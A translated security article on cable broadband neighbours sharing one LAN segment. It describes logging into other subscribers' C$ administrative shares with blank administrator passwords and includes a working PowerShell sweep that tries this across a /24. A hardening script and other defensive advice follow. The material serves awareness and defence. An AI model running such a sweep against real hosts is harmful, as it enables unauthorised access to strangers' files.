Sniffer attack and defense instances in the broadband Internet access environment

Source: Internet
Author: User

There are plenty of articles about broadband Internet security, but they mostly deal with Trojans and Internet Explorer vulnerabilities. Meanwhile a far more dangerous problem gets almost no attention from users and is not even covered by a firewall's default settings, yet once someone gets in, every drive and file on your machine is open for the taking, and the attack is trivially simple. What is it? Let me explain.

Thoughts

I am currently fitting out a new home, and over the past two days I have been thinking about the layout of its LAN. I already use the cable (Wired) broadband service and will certainly move it over, so there are two topologies to consider:

1. cable modem - hub - hosts;
2. cable modem - server (software router) - hub - hosts.

At first glance the first option is better: the topology is simpler, it saves at least one network card, and no server has to stay on all day. It is also what the Wired documentation recommends. But when I thought about file sharing between the hosts in the first option, I suddenly remembered a security issue I had not paid attention to for a long time.

As everyone knows, so-called residential (community) broadband is a LAN plus a shared Internet egress: the subscribers in a residential area sit on one LAN and reach the Internet through a single gateway. The security of this arrangement is rather poor, precisely because it is a LAN; if you are careless, other subscribers can help themselves to your shared resources. Cable broadband hides this better. Physically it is not the usual star Ethernet plus egress, and the DHCP server hands each subscriber a public class C address, so it looks as though you are facing the wide area network directly. What most people do not realise is that the coaxial bus physically joins almost all cable subscribers into one LAN, so we face exactly the same security problem as the community LAN, only across a larger population, which makes intrusion (strictly speaking not intrusion but "sharing") even more likely.

Experiment

To verify this, I ran the following experiment:

My host was assigned 211.167.123.8, a public class C address, so the subnet mask is 24 bits. In theory that puts 252 other hosts (254 usable addresses minus the gateway and me) in the same network segment. Given the actual take-up of the cable service, not all 252 addresses will be occupied, but there should be dozens of hosts online at any time, and I should be able to reach every one of them.

So I pinged the hosts from 211.167.123.2 to 211.167.123.15, and .15 answered, meaning it was online. I immediately opened IE and typed \\211.167.123.15 in the address bar. The system prompted for a user name and password: user name administrator, password blank. Nothing shared except the printer? No matter; I am already an administrator, so finding resources is not a problem. I typed \\211.167.123.15\c$ and the root directory of drive C appeared. This is the default administrative share of Windows 2000; it exists for remote management, and even if you delete it the system recreates it at the next boot unless a registry setting turns it off. Next came d$ and e$, and I could read everything on the machine.
During the experiment I also ran FluxayIV (Fluxay, "streamer") alongside, and one network segment was scanned in three to five minutes. It found dozens of hosts online, and on five or six of them the administrator account had a blank password. Isn't that a prime target? Even hosts that do have a password will not use a complicated one on a home PC, and cracking it with a dictionary is not very hard. Worse, one company host shared all of its resources with no password at all; it appears to have been used as a file server.
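The sweep described above, written out as an added PowerShell example (not code from the original article, which used IE and FluxayIV by hand). It follows the article's three steps exactly: ping each address in the /24, try the IPC$ share as administrator with a blank password, then list the root of C$. The subnet and the author's own address come from the article; the gateway address .1 is an assumption. PowerShell did not exist on Windows 2000; the equivalent there was a `for /L` loop in cmd.exe around `ping` and `net use`. Run this only against hosts you are authorised to test.

```powershell
# Added example: reproduce the article's sweep of one /24 with standard
# Windows tooling (Test-Connection, net use, UNC paths). Not from the article.
param(
    [string]$Network = "211.167.123",    # first three octets of the /24 in the article
    [string]$Self    = "211.167.123.8",  # the author's own address, skipped
    [string]$Gateway = "211.167.123.1"   # assumed gateway address, skipped
)

$found = @()
foreach ($last in 2..254) {
    $ip = "$Network.$last"
    if ($ip -eq $Self -or $ip -eq $Gateway) { continue }

    # Step 1 (article): ping to see whether the neighbour is online.
    if (-not (Test-Connection -ComputerName $ip -Count 1 -Quiet -ErrorAction SilentlyContinue)) {
        continue
    }

    # Step 2: connect to the hidden IPC$ share as "administrator" with a blank
    # password. net use exits 0 on success and non-zero (usually 2) on failure.
    net use "\\$ip\IPC$" "" /user:administrator 2>$null | Out-Null
    if ($LASTEXITCODE -ne 0) { continue }

    # Step 3: with that session established, the administrative share C$
    # (and D$, E$, ...) is browsable like any local folder.
    $root = Get-ChildItem "\\$ip\c$" -ErrorAction SilentlyContinue |
            Select-Object -First 5 -ExpandProperty Name
    $found += [pscustomobject]@{ Host = $ip; BlankAdminPassword = $true; CRoot = ($root -join ", ") }

    # Tear the session down again so the connection table does not fill up.
    net use "\\$ip\IPC$" /delete /y 2>$null | Out-Null
}

$found | Format-Table -AutoSize
```

One caveat a practitioner should know: from Windows XP onward the policy "Accounts: Limit local account use of blank passwords to console logon only" is enabled by default, so a blank-password administrator is refused over the network even when the password really is blank. The experiment above succeeds against the Windows 2000 hosts the article describes, not against later versions with that default intact.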

Conclusion

Now does everyone see which of the two topologies above is really better?

Because the cable provider hands out public class C addresses, we cannot lengthen the subnet mask ourselves to shrink the number of hosts in each segment, so the security of the cable network is a permanent problem for us subscribers. Moreover, the DHCP lease is valid for only about a week; after that you get a new IP address, which means a new segment with another 252 new neighbours waiting for you. Scary? The worst part is that a host in your segment is treated as a LAN host by your firewall, and the preset firewall rules generally do not defend against LAN hosts at all.

Preventive Measures

First, and at the very least, set a password (not too simple) on your Administrator account. This built-in account cannot be deleted, so you must not leave its password blank even if you never log on with it. During the experiment I found many users who routinely log on with another account, which does have a password, while the Administrator password is empty. What a waste of effort.

Some machines have a password on Administrator but leave several other accounts enabled with blank passwords, which is just as dangerous. Remember: set a password on every enabled account, review these accounts regularly, disable accounts that have not been used for a long time, and change the Administrator password frequently.

Installing one or two firewalls is a good approach, but remember to configure them, because by default hosts on the local LAN are not strictly filtered, and as shown above these "LAN" hosts are precisely what we most need to guard against. The firewall itself may also have vulnerabilities, so I run Skynet (天网) plus Norton; layered defence is reassuring. For details on configuring the firewall, see the related articles.
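The three preventive measures above (account passwords, unused accounts, and a firewall that does not trust the local subnet) plus a fix for the C$ share itself, as an added PowerShell example that is not part of the original article. It uses the built-in LocalAccounts and NetSecurity modules of Windows 8/2012 and later; on Windows 2000 the same settings were made by hand in Computer Management, regedit and the firewall GUI. The 90-day staleness threshold and the rule names are my own choices. Run it from an elevated prompt.

```powershell
# Added example: harden a Windows host against the attack in the article.
# Not from the article; cmdlets are from Microsoft.PowerShell.LocalAccounts,
# NetSecurity and SmbShare (Windows 8 / Server 2012 and later).

# 1. Accounts: flag enabled accounts that may have a blank password. A blank
#    password normally shows up as the "password not required" flag, or as a
#    password that was never set.
function Get-WeakLocalAccount {
    Get-LocalUser | Where-Object {
        $_.Enabled -and (-not $_.PasswordRequired -or $null -eq $_.PasswordLastSet)
    } | Select-Object Name, PasswordRequired, PasswordLastSet, LastLogon
}
Get-WeakLocalAccount | Format-Table -AutoSize

# Set a real password on the built-in Administrator (it cannot be deleted)...
$newPwd = Read-Host -Prompt "New Administrator password" -AsSecureString
Set-LocalUser -Name Administrator -Password $newPwd -PasswordNeverExpires $false

# ...and disable every other enabled account that has not logged on for
# 90 days (assumed threshold), never touching the account you are using now.
$stale = (Get-Date).AddDays(-90)
Get-LocalUser | Where-Object {
    $_.Enabled -and $_.Name -ne 'Administrator' -and $_.Name -ne $env:USERNAME -and
    ($null -eq $_.LastLogon -or $_.LastLogon -lt $stale)
} | ForEach-Object { Disable-LocalUser -Name $_.Name }

# 2. Shares: stop Windows recreating C$, D$, ... at every boot. The registry
#    values date from Windows NT/2000 and still work: AutoShareWks on
#    workstation editions (ProductType 1), AutoShareServer on server editions.
$lanman    = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$valueName = if ((Get-CimInstance Win32_OperatingSystem).ProductType -eq 1) { 'AutoShareWks' } else { 'AutoShareServer' }
Set-ItemProperty -Path $lanman -Name $valueName -Value 0 -Type DWord
# The shares stay until the next reboot; this shows what is still exposed now.
Get-SmbShare | Where-Object { $_.Special } | Select-Object Name, Path

# 3. Firewall: do NOT exempt the local subnet. Block inbound SMB and NetBIOS
#    from every remote address on every profile, which is the opposite of the
#    "trust LAN hosts" default the article warns about.
New-NetFirewallRule -DisplayName 'Block inbound SMB (any source)' -Direction Inbound `
    -Protocol TCP -LocalPort 139, 445 -RemoteAddress Any -Action Block -Profile Any
New-NetFirewallRule -DisplayName 'Block inbound NetBIOS (any source)' -Direction Inbound `
    -Protocol UDP -LocalPort 137, 138 -RemoteAddress Any -Action Block -Profile Any
```

The price of step 3 is the one the article mentions next: with SMB blocked from every address, your own hosts on the same /24 cannot reach each other's shares either, because the firewall has no way to tell them apart from the other 250 subscribers. If you need sharing, put your hosts behind a router of your own (the second topology) and allow SMB only from that private subnet instead of `Any`.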

One more reminder: once you have locked things down like this, a network built on the first topology can no longer share between your own hosts, because they stand on exactly the same footing as every other host in the /24. So if you are building your own network with security in mind, I recommend the second topology, and a hardware router is better still than a software router.

This article is meant only as a reference. If you come up with more convenient, safe and efficient preventive measures, please get in touch.

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.